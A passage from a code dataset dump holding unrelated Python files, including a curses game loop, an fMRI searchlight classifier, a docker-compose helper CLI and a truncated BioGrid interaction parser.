\"__main__\":\n\tmain()\n","sub_path":"transposition_cipher.py","file_name":"transposition_cipher.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"54980235","text":"import curses\nimport time\nfrom game_loop_events import(\n on_start,\n on_key_pressed,\n on_update,\n on_render \n)\n\n\nclass FigureConsoleDrawer:\n\n def __init__(self, stdscr):\n self.stdscr = stdscr\n\n def draw(self, figure):\n\n y = 0\n for r in figure.shape():\n x = 0\n for c in r:\n if c:\n self.stdscr.addstr(y + figure.position.y, x + figure.position.x, 'X')\n x += 1\n y += 1\n\n\ndef main(stdscr):\n \n drawer = FigureConsoleDrawer(stdscr)\n\n stdscr.nodelay(1)\n\n dt = 0\n time_spent = 0\n\n ctx = dict()\n ctx['drawer'] = drawer\n\n on_start(ctx)\n\n while True:\n\n stdscr.refresh()\n\n time_spent += dt\n\n started = time.time() \n\n # Обработка ввода\n c = None\n try:\n c = stdscr.getkey()\n except:\n pass\n\n if c:\n on_key_pressed(ctx, c)\n \n # Обработка модели\n \n on_update(ctx, dt)\n\n # Отрисовка\n stdscr.clear()\n on_render(ctx, dt)\n\n dt = time.time() - started\n\n if ctx.get('abort', False): break\n\n\ncurses.wrapper(main)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"332313819","text":"def lift(target, proba, n_buckets=10):\n import pandas as pd\n import numpy as np\n\n n_records = len(target)\n bucket_sz = int(n_records / n_buckets)\n\n counts = np.ones(n_buckets, int)*bucket_sz\n counts[:n_records%n_buckets] += 1\n tops = [np.full(c, n, int) for c, n in zip(counts, range(1, n_buckets+1))]\n tops = np.concatenate(tops)\n\n df = pd.DataFrame({'target': target, 'proba': proba})\n df = df.sort_values('proba', ascending=False)\n df['top'] = tops\n target_sum = df.groupby('top').target.sum()\n ff = pd.DataFrame({'target_cnt': target_sum, 'cnt': counts})\n ff['target_cnt_cum'] = ff.target_cnt.cumsum()\n ff['cnt_cum'] = ff.cnt.cumsum()\n ff['target_share'] = ff.target_cnt/ff.cnt\n ff['target_share_cum'] = ff.target_cnt_cum/ff.cnt_cum\n target_cnt = ff.target_cnt.sum()\n target_share = float(target_cnt)/ff.cnt.sum()\n ff['lift'] = ff.target_share/target_share\n ff['cum_lift'] = ff.target_share_cum/target_share\n ff['coverage'] = ff.target_cnt_cum/target_cnt\n return ff","sub_path":"sparktools/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"235292389","text":"\"\"\" write a program To get single character and print the ASCII value of it \"\"\"\n\n\nnum=int(input(\"Enter num : \"))\n\nif num < 10 :\n print(\"ASCII\")\n\nelse :\n print(\"It is not ASCII\")\n\n \n\n\n","sub_path":"if else programs/program --9.py","file_name":"program --9.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"321692814","text":"import wx\nglobal coord\ncoord = (30, 30)\nclass MyFrame(wx.Frame):\n\t\"\"\"create a color frame, inherits from wx.Frame\"\"\"\n\tglobal coord\n\tdef __init__(self, parent):\n\t\t# -1 is the default ID\n\t\twx.Frame.__init__(self, parent, -1, \"Click for mouse position\", size=(400,300),\n\t\t\t\t\t\t style=wx.DEFAULT_FRAME_STYLE | wx.NO_FULL_REPAINT_ON_RESIZE)\n\t\tself.SetBackgroundColour('Goldenrod')\n\t\tself.SetCursor(wx.StockCursor(wx.CURSOR_PENCIL))\n\n\t\t# hook some mouse events\n\t\tself.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)\n\t\tself.Bind(wx.EVT_RIGHT_DOWN, self.OnRightDown)\n\t\tself.Bind(wx.EVT_PAINT, self.OnPaint)\n\n\n\tdef OnLeftDown(self, event):\n\t\tglobal coord\n\t\t\"\"\"left mouse button is pressed\"\"\"\n\t\tpt = event.GetPosition() # position tuple\n\t\tprint (pt)\n\t\tcoord = pt\n\t\tself.SetTitle('LeftMouse = ' + str(pt))\n\t\tself.Refresh()\n\n\tdef OnRightDown(self, event):\n\t\tglobal coord\n\t\t\"\"\"right mouse button is pressed\"\"\"\n\t\tpt = event.GetPosition()\n\t\tcoord = pt\n\t\tprint (pt)\n\n\t\tself.SetTitle('RightMouse = ' + str(pt))\n\t\tself.Refresh()\n\n\n\tdef OnPaint(self, event):\n\t\tglobal coord\n\t\tdc = wx.PaintDC(self)\n\t\tdc.Clear()\n\t\tdc.SetPen(wx.Pen(wx.BLACK, 4))\n\t\tdc.DrawLine(0, 0, int(str(coord[0])), int(str(coord[1])))\n\napp = wx.PySimpleApp()\nframe = MyFrame(None)\nframe.Show(True)\napp.MainLoop()","sub_path":"_misc/mdraw.py","file_name":"mdraw.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"266992637","text":"#import necessary modules\n\nfrom classes import *\nimport cv2\n\n\n#Uses Laptop Camera\ncamera = cv2.VideoCapture(0)\n\n#Raises an error if unable to open camera\nif not camera.isOpened():\n raise IOError(\"Cannot Open Camera\")\nif camera.isOpened():\n print(\"Camera Opening...\", \"\\n\")\n print(\"Press ESC to Close Camera\", \"\\n\")\n\n\nwhile True:\n #reads evry frame\n ret, frame = camera.read()\n\n #creates an object with the class Frame and Face\n frameobject = Frame(frame)\n faceobject = Face(frame)\n\n #puts a christmas Hat over the head\n faceobject.putHat()\n\n #adds Christmas Lights, and Snow in the Background\n frameobject.putLights()\n\n frameobject.putSnow()\n\n #draws a beard, a mustache and colors the eyebrows and lips white\n frame = faceobject.Santa()\n\n #displays every frame\n cv2.imshow(\"Snapchat Filter\", frame)\n\n #breaks loop when ESC if pressed\n if cv2.waitKey(1) == 27:\n break\n\n#closes camera\nprint(\"Closing Camera\")\ncamera.release()\ncv2.destroyAllWindows()\n","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"557363486","text":"\"\"\"\nFor classifying fMRI images\n\"\"\"\n#%matplotlib inline\nimport os\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport mne\n\n#from nilearn import datasets\nfrom nilearn.image import new_img_like, load_img, index_img, clean_img, concat_imgs\nfrom nilearn.plotting import plot_stat_map, plot_img, show\nfrom nilearn import decoding, plotting\nfrom nilearn.decoding import SearchLight\nfrom nilearn.input_data import NiftiMasker\n\nfrom sklearn.model_selection import permutation_test_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import SVC\nfrom sklearn.svm import LinearSVC\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import cross_validate\n\n\n#########################################################################\n# Read ad split data\n#########################################################################\n\n\n#The fMRI data\nfmri_filepath = 'MR_classification/data/beta4D_all.nii'\nlabel_path = 'MR_classification/data/class_labels_faces.csv'\nmask_path = 'MR_classification/data/individual/mask_57.nii'\n#struct_path = 'MR_classification/data/single_subj_T1 copy.nii'\n#struct_path = 'MR_classification/sSubjectNo0054-0005-00001-000176-01.nii'\nstruct_path = 'MR_classification/wfSubjectNo0054-0006-00424-000424-01.nii'\n\n#load fMRI data\nfmri_img = load_img(fmri_filepath) \n\n#inspect data\nfmri_img.shape #dimensions (79, 95, 79, class_label) or 9*class_labels\n\n#load csv-file with class labels\nconditions = pd.read_csv(label_path, sep=\",\")\n\n#Make an index for spliting fMRI data with same size as class labels\nidx = np.arange(len(conditions))\n\n# create training and testing vars on the basis of class labels\nidx1, idx2, conditions1, conditions2 = train_test_split(idx, conditions, test_size=0.2)\n\n\n# Reshaping data------------------------------\nfmri_img1 = index_img(fmri_img, idx1)\nfmri_img2 = index_img(fmri_img, idx2)\n\nfmri_img1.shape\nfmri_img2.shape\n\n#Load the whole brain mask\nmask_img = load_img(mask_path)\n\n\n#########################################################################\n# Conduct searchlight SVM\n#########################################################################\nprint(\"doing SVM C = 0.025\")\n\n# The radius is the one of the Searchlight sphere that will scan the volume\nsearchlight = SearchLight(\n mask_img,\n estimator=LinearSVC(C = 0.025),\n radius=5, n_jobs=-1, # to use all cores \n verbose=1, cv=5)\nsearchlight.fit(fmri_img1, conditions1)\n\nsearchlight_img = new_img_like(struct_path, searchlight.scores_)\nplot_img(searchlight_img, bg_img=struct_path,\n vmin=.42, threshold=.2, black_bg=True, colorbar = True, draw_cross = False)\n\n\n\n # ----------\n####Create a mask with the 500 best voxels\nprint(searchlight.scores_.size)\n#Find the percentile that makes the cutoff for the 500 best voxels\nperc=100*(1-500.0/searchlight.scores_.size)\n#Print percentile\nprint(perc)\n#Find the cutoff\ncut=np.percentile(searchlight.scores_,perc)\n#Print cutoff\nprint(cut)\n\n\n# .astype() makes a copy.\nprocess_mask = mask_img.get_data().astype(np.int)\nprocess_mask[searchlight.scores_<=cut] = 0\nprocess_mask_img = new_img_like(mask_img, process_mask)\n\n\n#plotting.plot_glass_brain effects\nplotting.plot_glass_brain(searchlight_img, colorbar = True, threshold=cut)\n\nplotting.plot_roi(searchlight_img, bg_img=struct_path, colorbar = True, threshold = cut, cmap = 'RdBu_r', draw_cross = True)\nplotting.plot_roi(searchlight_img, bg_img=struct_path, colorbar = True, threshold = 0.6, cmap = 'RdBu_r', black_bg = True, draw_cross = False)\n\n\n####### Make a classification on the 2nd split using the best voxels\n\nmasker = NiftiMasker(mask_img=process_mask_img, standardize=False)\n\n# We use masker to retrieve a 2D array ready\n# for machine learning with scikit-learn\nfmri_masked = masker.fit_transform(fmri_img2)\n#Print size of matrix (images x voxels)\nprint(fmri_masked.shape)\n\n\ncv_score = cross_val_score(LinearSVC(C = 0.025), fmri_masked, np.ravel(conditions2), cv=5, scoring = 'accuracy')\nprint(cv_score)\nprint('Mean prediction score:')\nprint(np.mean(cv_score))\n\n#########################################################################\n# Permutation test - SVM\n#########################################################################\n\n\n#Perform a permutation test\nscore, permutation_scores, pvalue = permutation_test_score(\n LinearSVC(C = 0.025), fmri_masked, np.ravel(conditions2), cv=5, n_permutations=10_000, \n n_jobs=-1, random_state=0, verbose=0, scoring=None)\nprint(\"Classification Accuracy: %s (pvalue : %s)\" % (score, pvalue))\n\n#View a histogram of permutation scores\n\n#How many classes\nn_classes = np.unique(conditions2).size\n\nplt.hist(permutation_scores, 20, label='Permutation scores',\n edgecolor='black')\nylim = plt.ylim()\nplt.plot(2 * [score], ylim, '--g', linewidth=3,\n label='Classification Score'\n ' (pvalue %s)' % round(pvalue, 4))\nplt.plot(2 * [1. / n_classes], ylim, '--k', linewidth=3, label='Chance level')\n\nplt.ylim(ylim)\nplt.legend()\nplt.xlabel('Score')\nplt.show()\n\n\n\n#########################################################################\n# Redone using NB\n#########################################################################\n\nprint(\"\\n \\n doing NB\\n \\n \")\n\n# The radius is the one of the Searchlight sphere that will scan the volume\nsearchlightNB = SearchLight(\n mask_img,\n estimator=GaussianNB(),\n radius=5, n_jobs=-1, # to use all cores \n verbose=1, cv=5)\nsearchlightNB.fit(fmri_img1, conditions1)\n\nsearchlightNB_img = new_img_like(struct_path, searchlightNB.scores_)\nplot_img(searchlightNB_img, bg_img=struct_path,\n vmin=.42, threshold=.2, black_bg=True, colorbar = True, draw_cross = False)\n\n\nperc=100*(1-500.0/searchlightNB.scores_.size)\ncut=np.percentile(searchlightNB.scores_,perc)\nprocess_mask = mask_img.get_data().astype(np.int)\nprocess_mask[searchlightNB.scores_<=cut] = 0\nprocess_mask_img = new_img_like(mask_img, process_mask)\n\n#plotting\nplotting.plot_glass_brain(searchlightNB_img, colorbar = True, threshold=cut)\n\nplotting.plot_roi(searchlightNB_img, bg_img=struct_path, colorbar = True, threshold = cut, cmap = 'RdBu_r', draw_cross = False)\nplotting.plot_roi(searchlightNB_img, bg_img=struct_path, colorbar = True, threshold = 0.6, cmap = 'RdBu_r', black_bg = True, draw_cross = False)\n\nmasker = NiftiMasker(mask_img=process_mask_img, standardize=False)\nfmri_masked = masker.fit_transform(fmri_img2)\n\n#CV\ncv_score = cross_val_score(GaussianNB(), fmri_masked, np.ravel(conditions2), cv=5)\nprint(cv_score)\nprint('Mean prediction score:')\nprint(np.mean(cv_score))\n\n#Perform a permutation test\nscore, permutation_scores, pvalue= permutation_test_score(\n GaussianNB(), fmri_masked, np.ravel(conditions2), cv=5, n_permutations=10_000, \n n_jobs=-1, random_state=0, verbose=0, scoring=None)\nprint(\"Classification Accuracy: %s (pvalue : %s)\" % (score, pvalue))\n\n# plotting permutationstest\nn_classes = np.unique(conditions2).size\nplt.hist(permutation_scores, 20, label='Permutation scores',\n edgecolor='black')\nylim = plt.ylim()\nplt.plot(2 * [score], ylim, '--g', linewidth=3,\n label='Classification Score'\n ' (pvalue %s)' % round(pvalue, 4))\nplt.plot(2 * [1. / n_classes], ylim, '--k', linewidth=3, label='Chance level')\n\nplt.ylim(ylim)\nplt.legend()\nplt.xlabel('Score')\nplt.show()\n\n\n\n#########################################################################\n# Redone using less conservative SVM\n#########################################################################\nprint(\"\\n \\n doing SVM C = 1\\n \\n \")\n\n# The radius is the one of the Searchlight sphere that will scan the volume\nsearchlightSVM = SearchLight(\n mask_img,\n estimator=LinearSVC(C = 1),\n radius=5, n_jobs=-1, # to use all cores \n verbose=1, cv=5)\nsearchlightSVM.fit(fmri_img1, conditions1)\n\nsearchlightSVM_img = new_img_like(struct_path, searchlightSVM.scores_)\nplot_img(searchlightSVM_img, bg_img=struct_path,\n vmin=.42, threshold=.2, black_bg=True, colorbar = True, draw_cross = False)\n\n\nperc=100*(1-500.0/searchlightSVM.scores_.size)\ncut=np.percentile(searchlightSVM.scores_,perc)\nprocess_mask = mask_img.get_data().astype(np.int)\nprocess_mask[searchlightSVM.scores_<=cut] = 0\nprocess_mask_img = new_img_like(mask_img, process_mask)\n\n#plotting\nplotting.plot_glass_brain(searchlightSVM_img, colorbar = True, threshold=cut)\n\nplotting.plot_roi(searchlightSVM_img, bg_img=struct_path, colorbar = True, threshold = cut, cmap = 'RdBu_r', draw_cross = False)\nplotting.plot_roi(searchlightSVM_img, bg_img=struct_path, colorbar = True, threshold = 0.6, cmap = 'RdBu_r', black_bg = True, draw_cross = False)\n\nmasker = NiftiMasker(mask_img=process_mask_img, standardize=False)\nfmri_masked = masker.fit_transform(fmri_img2)\n\n#CV\ncv_score = cross_val_score(LinearSVC(C = 1), fmri_masked, np.ravel(conditions2), cv=5)\nprint(cv_score)\nprint('Mean prediction score:')\nprint(np.mean(cv_score))\n\n#Perform a permutation test\nscore, permutation_scores, pvalue= permutation_test_score(\n LinearSVC(C = 1), fmri_masked, np.ravel(conditions2), cv=5, n_permutations=10_000, \n n_jobs=-1, random_state=0, verbose=0, scoring=None)\nprint(\"Classification Accuracy: %s (pvalue : %s)\" % (score, pvalue))\n\n# plotting permutationstest\nn_classes = np.unique(conditions2).size\nplt.hist(permutation_scores, 20, label='Permutation scores',\n edgecolor='black')\nylim = plt.ylim()\nplt.plot(2 * [score], ylim, '--g', linewidth=3,\n label='Classification Score'\n ' (pvalue %s)' % round(pvalue, 4))\nplt.plot(2 * [1. / n_classes], ylim, '--k', linewidth=3, label='Chance level')\n\nplt.ylim(ylim)\nplt.legend()\nplt.xlabel('Score')\nplt.show()\n\n\n## Save models:\nfrom joblib import dump, load\n\n\ndump(searchlightSVM, \"searchlight_svm_c1.joblib\")\ndump(searchlightNB, \"searchlight_NB.joblib\")\ndump(searchlight, \"searchlight_svm_c0.025.joblib\")\n\n\ntest = load(\"searchlight_svm_c0.025.joblib\")\n\nnp.max(test.scores_)\n\nperc=100*(1-500.0/test.scores_.size)\ncut=np.percentile(test.scores_,perc)\n#########################################################################\n# Amygdala\n#########################################################################\nam_mask_path = 'MR_classification/amygdala_mask.nii'\n\nam_mask_img = load_img(mask_path)\n\nam_masker = NiftiMasker(mask_img=am_mask_img, standardize=False)\nfmri_masked = am_masker.fit_transform(fmri_img)\nconditions = np.repeat(np.ravel(conditions), 9)\n\nam_cv = cross_validate(LinearSVC(C = 0.025), fmri_masked, conditions, cv=8, n_jobs=-1, scoring=\"accuracy\")\nprint(\"cv_mean:\", np.mean(am_cv['accuracy']))\n\nscore, permutation_scores, pvalue = permutation_test_score(\n LinearSVC(C = 0.025), fmri_masked, conditions, cv=8, n_permutations=100, \n n_jobs=-1)\n\nn_classes = np.unique(conditions2).size\nplt.hist(permutation_scores, 20, label='Permutation scores',\n edgecolor='black')\nylim = plt.ylim()\nplt.plot(2 * [score], ylim, '--g', linewidth=3,\n label='Classification Score'\n ' (pvalue %s)' % round(pvalue, 4))\nplt.plot(2 * [1. / n_classes], ylim, '--k', linewidth=3, label='Chance level')\n\nplt.ylim(ylim)\nplt.legend()\nplt.xlabel('Score')\nplt.show()","sub_path":"MR_classification/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":11149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"277646782","text":"# cli.py\nfrom __future__ import absolute_import\n\nimport logging\nimport os\nimport re\nimport subprocess\nimport sys\n\nimport click\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_MACHINE_NAME = os.environ.get('DO_MACHINE_NAME')\n\n# use to allow -h for for help\nCONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])\n\ndef get_container_id(name):\n name_id = _run_command('docker-compose ps -q {}'.format(name))\n\n name_id = name_id.strip()\n\n if '\\n' in name_id:\n name_id = name_id.split('\\n')[-1]\n\n return name_id.strip()\n\n@click.group(context_settings=CONTEXT_SETTINGS)\n@click.version_option('1.0.0')\n@click.pass_context\ndef cli(ctx):\n pass\n\n@cli.command(context_settings=dict(\n ignore_unknown_options=True,\n))\n@click.argument('ARGS', nargs=-1, type=click.UNPROCESSED)\ndef migrate(args):\n \"\"\"Migrate the Django app\"\"\"\n web_id = get_container_id('web')\n\n _run_command(\n 'docker exec -it {} python manage.py migrate --noinput {}'.format(\n web_id, ' '.join(args)),\n interactive=True,\n unbuffered_print=True)\n\n@cli.command(context_settings=dict(\n ignore_unknown_options=True,\n))\n@click.argument('ARGS', nargs=-1, type=click.UNPROCESSED)\ndef makemigrations(args):\n \"\"\"Make migrations\"\"\"\n web_id = get_container_id('web')\n\n _run_command(\n 'docker exec -it {} python manage.py makemigrations --noinput {}'.format(\n web_id, ' '.join(args)),\n interactive=True,\n unbuffered_print=True)\n\n@cli.command()\ndef attach():\n \"\"\"Attach to the running web container for debugging\"\"\"\n web_id = get_container_id('web')\n\n _run_command(\n 'docker attach {}'.format(web_id),\n interactive=True,\n unbuffered_print=True)\n\n@cli.command()\n@click.argument('CONTAINER', default='web', type=click.STRING, nargs=1)\ndef bash(container):\n \"\"\"Start a bash shell on CONTAINER. Default: web\"\"\"\n container_id = get_container_id(container)\n\n _run_command(\n 'docker exec -it {} /bin/bash --login'.format(container_id),\n interactive=True)\n\ndef _run_command(cmd, interactive=False, use_docker_env=False,\n unbuffered_print=False):\n \"\"\"\n Executes a given shell command\n\n Args:\n cmd (str): The command to execute\n interact (bool): If True hand the controlling terminal over to the\n subprocess. Useful when user input is needed for the command\n use_docker_env (bool): Prefix the commands with the output of\n ``docker-machine env ``.\n\n Returns:\n str: Output of the command\n \"\"\"\n logger.debug(cmd)\n env = None\n if use_docker_env:\n env = docker_env_prefix()\n\n if interactive:\n try:\n import pexpect\n except ImportError:\n sys.stderr.write('Missing pexpect requirement. pip install '\n 'pexpect')\n sys.exit(1)\n sys.stdout.write('Running interactive command...\\n')\n\n cmd = cmd.split(' ')\n pexpect.spawn(cmd[0], list(cmd[1:]), env=env).interact()\n else:\n import subprocess\n\n try:\n p = subprocess.Popen(\n cmd.strip(),\n shell=True,\n bufsize=0,\n stdout=subprocess.PIPE,\n stderr=sys.stderr,\n env=env)\n\n if unbuffered_print:\n while p.poll() is None:\n for l in p.stdout.readline():\n click.echo(l, nl=False)\n else:\n p.wait()\n return p.stdout.read().decode(\"utf8\")\n\n except subprocess.CalledProcessError:\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n cli()\n","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"85611509","text":"import os\nimport logging\nimport re\n\nfrom datetime import datetime\nfrom stat import ST_CTIME\nfrom zipfile import ZipFile\n\nfrom dipper import config\nfrom dipper.sources.Source import Source\nfrom dipper.models.Model import Model\nfrom dipper.models.assoc.InteractionAssoc import InteractionAssoc\nfrom dipper.models.Dataset import Dataset\n\n__author__ = 'nicole'\n\nlogger = logging.getLogger(__name__)\nBGDL = 'http://thebiogrid.org/downloads/archives/Latest%20Release'\n\n\nclass BioGrid(Source):\n \"\"\"\n Biogrid interaction data\n\n \"\"\"\n # TODO write up class summary for docstring\n\n files = {\n 'interactions': {\n 'file': 'interactions.mitab.zip',\n 'url': BGDL + '/BIOGRID-ALL-LATEST.mitab.zip'},\n 'identifiers': {\n 'file': 'identifiers.tab.zip',\n 'url': BGDL + '/BIOGRID-IDENTIFIERS-LATEST.tab.zip'}\n }\n\n # biogrid-specific identifiers for use in subsetting identifier mapping\n biogrid_ids = [\n 106638, 107308, 107506, 107674, 107675, 108277, 108506, 108767, 108814,\n 108899, 110308, 110364, 110678, 111642, 112300, 112365, 112771, 112898,\n 199832, 203220, 247276, 120150, 120160, 124085]\n\n def __init__(self, graph_type, are_bnodes_skolemized, tax_ids=None):\n super().__init__(graph_type, are_bnodes_skolemized, 'biogrid')\n\n self.tax_ids = tax_ids\n\n self.dataset = Dataset(\n 'biogrid', 'The BioGrid', 'http://thebiogrid.org/', None,\n 'http://wiki.thebiogrid.org/doku.php/terms_and_conditions')\n\n # Defaults\n # our favorite animals\n # taxids = [9606,10090,10116,7227,7955,6239,8355]\n if self.tax_ids is None:\n self.tax_ids = [9606, 10090, 7955]\n\n if 'test_ids' not in config.get_config() or \\\n 'gene' not in config.get_config()['test_ids']:\n logger.warning(\"not configured with gene test ids.\")\n else:\n self.test_ids = config.get_config()['test_ids']['gene']\n\n # data-source specific warnings\n # (will be removed when issues are cleared)\n logger.warning(\n \"several MI experimental codes do not exactly map to ECO; \"\n \"using approximations.\")\n return\n\n def fetch(self, is_dl_forced=False):\n \"\"\"\n\n :param is_dl_forced:\n :return: None\n \"\"\"\n\n self.get_files(is_dl_forced)\n\n # the version number is encoded in the filename in the zip.\n # for example, the interactions file may unzip to\n # BIOGRID-ALL-3.2.119.mitab.txt, where the version number is 3.2.119\n f = '/'.join((self.rawdir, self.files['interactions']['file']))\n st = os.stat(f)\n filedate = datetime.utcfromtimestamp(st[ST_CTIME]).strftime(\"%Y-%m-%d\")\n with ZipFile(f, 'r') as myzip:\n flist = myzip.namelist()\n # assume that the first entry is the item\n fname = flist[0]\n # get the version from the filename\n version = \\\n re.match(r'BIOGRID-ALL-(\\d+\\.\\d+\\.\\d+)\\.mitab.txt', fname)\n myzip.close()\n\n self.dataset.setVersion(filedate, str(version.groups()[0]))\n\n return\n\n def parse(self, limit=None):\n \"\"\"\n\n :param limit:\n :return:\n\n \"\"\"\n if self.testOnly:\n self.testMode = True\n\n self._get_interactions(limit)\n self._get_identifiers(limit)\n\n logger.info(\"Loaded %d test graph nodes\", len(self.testgraph))\n logger.info(\"Loaded %d full graph nodes\", len(self.graph))\n\n return\n\n def _get_interactions(self, limit):\n logger.info(\"getting interactions\")\n line_counter = 0\n f = '/'.join((self.rawdir, self.files['interactions']['file']))\n myzip = ZipFile(f, 'r')\n # assume that the first entry is the item\n fname = myzip.namelist()[0]\n matchcounter = 0\n\n with myzip.open(fname, 'r') as csvfile:\n for line in csvfile:\n # skip comment lines\n if re.match(r'^#', line.decode()):\n logger.debug(\"Skipping header line\")\n continue\n line_counter += 1\n line = line.decode().strip()\n # print(line)\n (interactor_a, interactor_b, alt_ids_a, alt_ids_b, aliases_a,\n aliases_b, detection_method, pub_author, pub_id, taxid_a,\n taxid_b, interaction_type, source_db, interaction_id,\n confidence_val) = line.split('\\t')\n\n # get the actual gene ids,\n # typically formated like: gene/locuslink:351|BIOGRID:106848\n gene_a_num = re.search(\n r'locuslink\\:(\\d+)\\|?', interactor_a).groups()[0]\n gene_b_num = re.search(\n r'locuslink\\:(\\d+)\\|?', interactor_b).groups()[0]\n\n if self.testMode:\n g = self.testgraph\n # skip any genes that don't match our test set\n if (int(gene_a_num) not in self.test_ids) or\\\n (int(gene_b_num) not in self.test_ids):\n continue\n else:\n g = self.graph\n # when not in test mode, filter by taxon\n if int(re.sub(r'taxid:', '', taxid_a.rstrip())) not in\\\n self.tax_ids or\\\n int(re.sub(\n r'taxid:', '', taxid_b.rstrip())) not in\\\n self.tax_ids:\n continue\n else:\n matchcounter += 1\n\n gene_a = 'NCBIGene:'+gene_a_num\n gene_b = 'NCBIGene:'+gene_b_num\n\n # get the interaction type\n # psi-mi:\"MI:0407\"(direct interaction)\n int_type = re.search(r'MI:\\d+', interaction_type).group()\n rel = self._map_MI_to_RO(int_type)\n\n # scrub pubmed-->PMID prefix\n pub_id = re.sub(r'pubmed', 'PMID', pub_id)\n # remove bogus whitespace\n pub_id = pub_id.strip()\n\n # get the method, and convert to evidence code\n det_code = re.search(r'MI:\\d+', detection_method).group()\n evidence = self._map_MI_to_ECO(det_code)\n\n # note that the interaction_id is some kind of internal biogrid\n # identifier that does not map to a public URI.\n # we will construct a monarch identifier from this\n\n assoc = InteractionAssoc(g, self.name, gene_a, gene_b, rel)\n assoc.add_evidence(evidence)\n assoc.add_source(pub_id)\n assoc.add_association_to_graph()\n\n if not self.testMode and (\n limit is not None and line_counter > limit):\n break\n\n myzip.close()\n\n return\n\n def _get_identifiers(self, limit):\n \"\"\"\n This will process the id mapping file provided by Biogrid.\n The file has a very large header, which we scan past,\n then pull the identifiers, and make equivalence axioms\n\n :param limit:\n :return:\n\n \"\"\"\n\n logger.info(\"getting identifier mapping\")\n line_counter = 0\n f = '/'.join((self.rawdir, self.files['identifiers']['file']))\n myzip = ZipFile(f, 'r')\n # assume that the first entry is the item\n fname = myzip.namelist()[0]\n foundheader = False\n\n # TODO align this species filter with the one above\n # speciesfilters = 'Homo sapiens,Mus musculus,Drosophila melanogaster,\n # Danio rerio, Caenorhabditis elegans,Xenopus laevis'.split(',')\n\n speciesfilters = 'Homo sapiens,Mus musculus'.split(',')\n with myzip.open(fname, 'r') as csvfile:\n for line in csvfile:\n # skip header lines\n if not foundheader:\n if re.match(r'BIOGRID_ID', line.decode()):\n foundheader = True\n continue\n\n line = line.decode().strip()\n # BIOGRID_ID\n # IDENTIFIER_VALUE\n # IDENTIFIER_TYPE\n # ORGANISM_OFFICIAL_NAME\n # 1\t814566\tENTREZ_GENE\tArabidopsis thaliana\n (biogrid_num, id_num, id_type,\n organism_label) = line.split('\\t')\n\n if self.testMode:\n g = self.testgraph\n # skip any genes that don't match our test set\n if int(biogrid_num) not in self.biogrid_ids:\n continue\n else:\n g = self.graph\n\n model = Model(g)\n\n # for each one of these,\n # create the node and add equivalent classes\n biogrid_id = 'BIOGRID:'+biogrid_num\n prefix = self._map_idtype_to_prefix(id_type)\n\n # TODO make these filters available as commandline options\n # geneidtypefilters='NCBIGene,OMIM,MGI,FlyBase,ZFIN,MGI,HGNC,\n # WormBase,XenBase,ENSEMBL,miRBase'.split(',')\n geneidtypefilters = 'NCBIGene,MGI,ENSEMBL,ZFIN,HGNC'.split(',')\n # proteinidtypefilters='HPRD,Swiss-Prot,NCBIProtein'\n if (speciesfilters is not None) \\\n and (organism_label.strip() in speciesfilters):\n line_counter += 1\n if (geneidtypefilters is not None) \\\n and (prefix in geneidtypefilters):\n mapped_id = ':'.join((prefix, id_num))\n model.addEquivalentClass(biogrid_id, mapped_id)\n # this symbol will only get attached to the biogrid class\n elif id_type == 'OFFICIAL_SYMBOL':\n model.addClassToGraph(biogrid_id, id_num)\n # elif (id_type == 'SYNONYM'):\n # FIXME - i am not sure these are synonyms, altids?\n # gu.addSynonym(g,biogrid_id,id_num)\n\n if not self.testMode and limit is not None \\\n and line_counter > limit:\n break\n\n myzip.close()\n\n return\n\n @staticmethod\n def _map_MI_to_RO(mi_id):\n rel = InteractionAssoc.interaction_object_properties\n mi_ro_map = {\n # colocalization\n 'MI:0403': rel['colocalizes_with'],\n # direct interaction\n 'MI:0407': rel['interacts_with'],\n # synthetic genetic interaction defined by inequality\n 'MI:0794': rel['genetically_interacts_with'],\n # suppressive genetic interaction defined by inequality\n 'MI:0796': rel['genetically_interacts_with'],\n # additive genetic interaction defined by inequality\n 'MI:0799': rel['genetically_interacts_with'],\n # association\n 'MI:0914': rel['interacts_with'],\n # physical association\n 'MI:0915': rel['interacts_with']\n }\n\n ro_id = rel['interacts_with'] # default\n if mi_id in mi_ro_map:\n ro_id = mi_ro_map.get(mi_id)\n\n return ro_id\n\n @staticmethod\n def _map_MI_to_ECO(mi_id):\n eco_id = 'ECO:0000006' # default to experimental evidence\n mi_to_eco_map = {\n 'MI:0018': 'ECO:0000068', # yeast two-hybrid\n 'MI:0004': 'ECO:0000079', # affinity chromatography\n 'MI:0047': 'ECO:0000076', # far western blotting\n 'MI:0055': 'ECO:0000021', # should be FRET, but using physical_interaction FIXME\n 'MI:0090': 'ECO:0000012', # desired: protein complementation, using: functional complementation\n 'MI:0096': 'ECO:0000085', # desired: pull down, using: immunoprecipitation\n 'MI:0114': 'ECO:0000324', # desired: x-ray crystallography, using: imaging assay\n 'MI:0254': 